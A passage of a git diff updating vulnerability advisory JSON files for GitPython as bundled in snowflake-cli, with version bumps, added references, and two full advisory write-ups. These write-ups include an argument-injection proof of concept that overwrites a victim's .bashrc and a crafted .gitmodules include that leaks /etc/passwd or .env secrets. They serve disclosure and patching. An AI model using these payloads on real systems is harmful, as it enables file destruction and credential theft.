"pkg:pypi/gitpython@3.1.59" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-73622.json b/advisories/BREW-snowflake-cli-CVE-2026-73622.json index 688cc92bd04..4170ce07be9 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-73622.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-73622.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-73622", "published": "2026-08-14T09:40:25Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-94p4-4cq8-9g67", - "CVE-2026-73622" + "CVE-2026-73622", + "PYSEC-2026-3951" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.55", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-73623.json b/advisories/BREW-snowflake-cli-CVE-2026-73623.json index 8811d27a1d3..a50c9e02607 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-73623.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-73623.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-73623", "published": "2026-08-14T09:40:25Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:29Z", "upstream": [ "GHSA-6p8h-3wgx-97gf", - "CVE-2026-73623" + "CVE-2026-73623", + "PYSEC-2026-3952" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.54", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-73624.json b/advisories/BREW-snowflake-cli-CVE-2026-73624.json index 6876cd3aaf0..ca491d1ac47 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-73624.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-73624.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-73624", "published": "2026-08-14T09:40:25Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-fjr4-x663-mwxc", "CVE-2026-73624" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.54", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-73625.json b/advisories/BREW-snowflake-cli-CVE-2026-73625.json index 55ab5ef4733..24997ab0eb7 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-73625.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-73625.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-73625", "published": "2026-08-14T09:40:25Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-r9mr-m37c-5fr3", - "CVE-2026-73625" + "CVE-2026-73625", + "PYSEC-2026-3953" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.54", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-76217.json b/advisories/BREW-snowflake-cli-CVE-2026-76217.json index 4e24e948093..a17a3be278b 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-76217.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-76217.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-76217", "published": "2026-08-20T09:40:01Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-hh9p-6wh2-4mfc", - "CVE-2026-76217" + "CVE-2026-76217", + "PYSEC-2026-3841" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hh9p-6wh2-4mfc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76217" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-pathspec-from-file" } ] } diff --git a/advisories/BREW-snowflake-cli-CVE-2026-76218.json b/advisories/BREW-snowflake-cli-CVE-2026-76218.json index d458c6c6572..2475d2342fd 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-76218.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-76218.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-76218", "published": "2026-08-20T09:40:01Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-9rj7-rf2p-w77r", - "CVE-2026-76218" + "CVE-2026-76218", + "PYSEC-2026-3840" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-9rj7-rf2p-w77r" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76218" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-repo-init" } ] } diff --git a/advisories/BREW-snowflake-cli-CVE-2026-76219.json b/advisories/BREW-snowflake-cli-CVE-2026-76219.json index e7daf1773f9..ced7d1a8c3f 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-76219.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-76219.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-76219", "published": "2026-08-20T09:40:01Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:29Z", "upstream": [ "GHSA-4gmw-gg2m-w46p", - "CVE-2026-76219" + "CVE-2026-76219", + "PYSEC-2026-3838" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,14 +46,14 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] }, "summary": "GitPython: Unguarded git read-tree option forwarding in IndexFile.from_tree/reset/merge_tree enables arbitrary file overwrite", - "details": "## Summary\n`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", + "details": "## Summary\n`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-4gmw-gg2m-w46p" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76219" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-overwrite-via-read-tree" } ] } diff --git a/advisories/BREW-snowflake-cli-CVE-2026-76220.json b/advisories/BREW-snowflake-cli-CVE-2026-76220.json index 53194010ae2..3285255c9a6 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-76220.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-76220.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-76220", "published": "2026-08-20T09:40:01Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-wvpp-8hx9-p66j", - "CVE-2026-76220" + "CVE-2026-76220", + "PYSEC-2026-3843" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-wvpp-8hx9-p66j" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76220" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-execution-via-split-single-char-options" } ] } diff --git a/advisories/BREW-snowflake-cli-CVE-2026-76221.json b/advisories/BREW-snowflake-cli-CVE-2026-76221.json index e8ca8daf2cc..8add7343770 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-76221.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-76221.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-76221", "published": "2026-08-20T09:40:01Z", - "modified": "2026-09-04T10:05:02Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-jm78-9fvv-mhgr", "CVE-2026-76221", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-76222.json b/advisories/BREW-snowflake-cli-CVE-2026-76222.json index 41a48841640..3460f589323 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-76222.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-76222.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-76222", "published": "2026-08-20T09:40:01Z", - "modified": "2026-09-04T10:05:02Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-hmq2-w58f-27jc", "CVE-2026-76222", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] @@ -73,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hmq2-w58f-27jc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76222" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2202" @@ -92,6 +88,14 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3784.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-gitmodules-submodule-name" } ] } diff --git a/advisories/BREW-snowflake-cli-CVE-2026-78675.json b/advisories/BREW-snowflake-cli-CVE-2026-78675.json index c3082d9d114..5e488361cdc 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-78675.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-78675.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-78675", "published": "2026-09-04T10:05:02Z", - "modified": "2026-09-04T10:05:02Z", + "modified": "2026-09-10T20:56:29Z", "upstream": [ "PYSEC-2026-3785", "CVE-2026-78675", @@ -21,16 +21,19 @@ "events": [ { "introduced": "0" + }, + { + "fixed": "3.27.0" } ] } ], "ecosystem_specific": { - "fix": null, - "range_state": "affected", + "fix": "bump", + "range_state": "fixed", "upstream_fixed_in": "3.1.59", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -43,27 +46,56 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] }, - "details": "GitPython before 3.1.59 fails to disable merge_includes when parsing .gitmodules, allowing attackers to disclose local file content by including arbitrary file paths via [include] directives. Attackers can craft a malicious .gitmodules file with include directives pointing to sensitive files; when repo.submodules is accessed, GitConfigParser raises MissingSectionHeaderError embedding the target file's first line verbatim in the exception message.", + "summary": "GitPython: Arbitrary local file content disclosure via [include] directive in untrusted .gitmodules (SubmoduleConfigParser never disables merge_includes)", + "details": "# [HIGH] Arbitrary local file content disclosure via `[include]` directive in untrusted `.gitmodules` (`SubmoduleConfigParser` never disables `merge_includes`)\n\n- **CWE:** CWE-200 (Exposure of Sensitive Information) / CWE-73 (External Control of File Name or Path)\n- **Affected component:** `git/objects/submodule/base.py`, `Submodule._config_parser()` (~line 273) constructing `SubmoduleConfigParser(fp_module, read_only=read_only)`; `git/config.py`, `GitConfigParser.__init__` (`merge_includes` default), `GitConfigParser.read()`/`_included_paths()` (include-path resolution, ~lines 630-685), `GitConfigParser._read()` (~line 493-498, `MissingSectionHeaderError`)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`GitConfigParser.__init__` defaults `merge_includes=True`: any config file it parses has its `[include]` (and, when a `repo=` is supplied, `[includeIf ...]`) directives followed and merged in. The maintainers already recognized this as dangerous for one specific case and fixed it in commit `41ecc6a4` (\"Disable merge_includes in config writers\"), which passes `merge_includes=False` when `Repo.config_writer()` builds its parser (`git/repo/base.py`).\n\nThat fix never touched `Submodule._config_parser()`. This method builds the parser used for **every** read of a repo's submodule configuration — `repo.submodules`, `Submodule.iter_items()`, `Submodule.config()` — via `SubmoduleConfigParser(fp_module, read_only=read_only)`, passing neither `merge_includes=False` nor `repo=`. The `True` class default is therefore inherited unchanged, and `fp_module` here is `.gitmodules` — **the single most attacker-controlled config file in the entire codebase**, since it ships verbatim as tracked content inside any cloned repository.\n\n`GitConfigParser.read()`'s include-path resolution (~line 662-680) performs no containment check: `osp.isabs(include_path)` short-circuits the path join entirely for an absolute path, and a relative path is joined with `osp.join(osp.dirname(file_path), include_path)` / `osp.normpath()`'d with no check that the result stays under the repository. `~` is expanded via `osp.expanduser`. The only gate before opening is `os.access(include_path, os.R_OK)` — a readability check, not a path restriction.\n\nOnce opened, `GitConfigParser._read()` parses the target file as git-config INI. If the first non-blank/non-comment line is not a `[section]` header — true of virtually any non-gitconfig file (source code, `/etc/passwd`, `.env` files, credential files, logs, JSON/YAML) — it raises `configparser.MissingSectionHeaderError(fpname, lineno, line)`. Python's stdlib formats this exception's `str()` as `\"File contains no section headers.\\nfile: %r, line: %d\\n%r\" % (fpname, lineno, line)` — it embeds the **verbatim content** of that file's first line in the exception message. `Submodule.iter_items()` catches only `(IOError, BadName)`, not `configparser.Error`, so this exception propagates straight out of the ordinary, read-only `repo.submodules` call.\n\n## Root cause\nParity gap between two config-parser construction sites for the exact same footgun: `Repo.config_writer()` was hardened against `merge_includes` in 2023 (`41ecc6a4`); `Submodule._config_parser()` — which parses `.gitmodules`, content that is *always* attacker-controlled the moment a repository is cloned from an untrusted source — was never given the same treatment. (The submodule *write*-mode config parser at `git/objects/submodule/base.py` for `.git/modules//config` — a different, locally-generated file — has correctly passed `merge_includes=False` since 2022, underscoring that the omission for `.gitmodules` reads looks like an oversight rather than a considered exception.)\n\n## Exploit path\n1. Attacker crafts a repository whose `.gitmodules` contains a legitimate-looking `[submodule ...]` section plus:\n ```\n [include]\n \tpath = /etc/passwd\n ```\n (an absolute path bypasses any traversal reasoning entirely; a relative `../../../../etc/passwd`-style path works too).\n2. Victim performs the extremely common, entirely read-only operation of enumerating a cloned repo's submodules: `list(repo.submodules)` (or any `for sm in repo.submodules`) — no `update()`, `init()`, or checkout of any kind required.\n3. `SubmoduleConfigParser` (inheriting `merge_includes=True`) follows the `[include]` directive, opens `/etc/passwd`, and `GitConfigParser._read()` raises `MissingSectionHeaderError` whose message embeds `/etc/passwd`'s first line verbatim.\n4. This exception surfaces wherever the host application observes exceptions from GitPython — CI logs, error pages, exception trackers, or any dependency-scanner/code-review-bot/hosting-platform tool built on `repo.submodules` — disclosing the targeted file's first line to the attacker (directly, or indirectly via any channel that echoes the error).\n\n## Impact\nNon-blind local file content disclosure (first line) of any file readable by the victim process, triggered purely by attacker-controlled repository content and one routine, read-only GitPython call. Bounded to one line per triggering file (parsing aborts at the first `MissingSectionHeaderError`), but that line very often *is* the secret — `.env` files (`DATABASE_URL=...`, `API_KEY=...`), single-line credential/token files, `/etc/passwd`'s root entry for host fingerprinting. The primitive additionally serves as a generic error-based file-existence oracle for arbitrary host paths. This is materially stronger than the already-fixed, explicitly **blind** `GHSA-cwvm-v4w8-q58c` (\"Blind local file inclusion\", CVSS 4.0, `git/refs/symbolic.py` ref-name resolution) — that advisory's own writeup states it cannot disclose content; this one does, verbatim, via a different module (`git/config.py`'s include resolution).\n\n## Preconditions\n- Victim clones (or otherwise opens with GitPython) a repository whose `.gitmodules` is attacker-controlled — the default trust model for any tool that processes third-party repositories (dependency scanners, CI, code hosting/review bots, \"audit this repo\" utilities — exactly the class of application GitPython itself is built for).\n- Victim performs any operation that touches `repo.submodules` — one of the most ordinary GitPython operations, requiring no submodule `update`/`init`/checkout.\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py` — `GitConfigParser.__init__` defaults `merge_includes=True`.\n- `git/objects/submodule/base.py:273` — `SubmoduleConfigParser(fp_module, read_only=read_only)` passes neither `merge_includes` nor `repo=`; `git blame` shows this call unchanged since the class was introduced, and `git show 41ecc6a4` confirms that commit touched only `git/repo/base.py`'s `Repo.config_writer()`, never this call site.\n- `git/config.py` `_included_paths()`/`read()` (~630-685) — absolute include paths bypass the join/normpath entirely (`osp.isabs()` short-circuit); no repository-boundary containment check exists anywhere in this path.\n- `git/config.py` `_read()` (~493-498) — raises `cp.MissingSectionHeaderError(fpname, lineno, line)` with the raw file line embedded, matching Python stdlib `configparser`'s own `__str__` behavior.\n- `Submodule.iter_items()` catches only `(IOError, BadName)` — `configparser.Error` (the base of `MissingSectionHeaderError`) is not swallowed.\n- PoC (`gitpython-003-poc.py`, embedded below) reproduces this end-to-end against this exact checkout via the public API only (`Repo.clone_from` + `list(repo.submodules)`, default arguments, no monkeypatching), against both a throwaway secret file and `/etc/passwd`.\n\n## False-positive check (adversarial re-read)\n- **Is this the same bug as `GHSA-hmq2-w58f-27jc`?** No — that advisory is about the `.gitmodules` submodule *name* driving `_module_abspath`/`os.makedirs()` (creating a git repository/module directory outside the working tree, a write/RCE-adjacent primitive via a completely different function). This finding is about the `[include]` directive in the *same file* reaching a config-parser read primitive — a different mechanism, different function, different impact class (content disclosure, not directory creation).\n- **Is this the same bug as `GHSA-cwvm-v4w8-q58c` (blind LFI)?** No — that advisory is explicitly documented by its own reporter as content-free/blind (existence-only), and lives in `git/refs/symbolic.py`'s ref-name resolution feeding `Repo.commit`/`tree`/`index.diff` — an entirely different module and code path. This finding discloses actual file content via `git/config.py`'s include-directive resolution.\n- **Is the impact overstated given only one line leaks?** No — this is an accurate scoping caveat already reflected in the severity/impact discussion, not a reachability blocker: attacker has full control over which path is targeted (absolute paths work unconditionally), requires zero interaction beyond the single most common submodule operation, and the PoC demonstrates a real, working end-to-end disclosure through the standard `clone_from` + `list(repo.submodules)` workflow.\n- **Could the exception simply be silently swallowed by GitPython before reaching the caller?** No — confirmed by reading `Submodule.iter_items()`'s exception handling, which catches only `IOError`/`BadName`; `configparser.MissingSectionHeaderError` propagates uncaught.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently against both a throwaway secret file and `/etc/passwd`.\n\n## Remediation\nPass `merge_includes=False` when constructing `SubmoduleConfigParser` in `Submodule._config_parser()` (`git/objects/submodule/base.py`), mirroring the existing fix in `Repo.config_writer()` (commit `41ecc6a4`) — `.gitmodules` content is always attacker-controlled and should never be allowed to pull in `include`/`includeIf` directives. As defense in depth, `GitConfigParser.read()`'s include-path resolution should enforce that resolved include paths stay within the repository's own directory tree, and parsing-error messages (`MissingSectionHeaderError`/`ParsingError`) should avoid embedding raw file content when parsing a file the caller did not explicitly ask to open.\n\n## Confidence\nHigh. Root cause confirmed by direct code reading across both `git/config.py` and 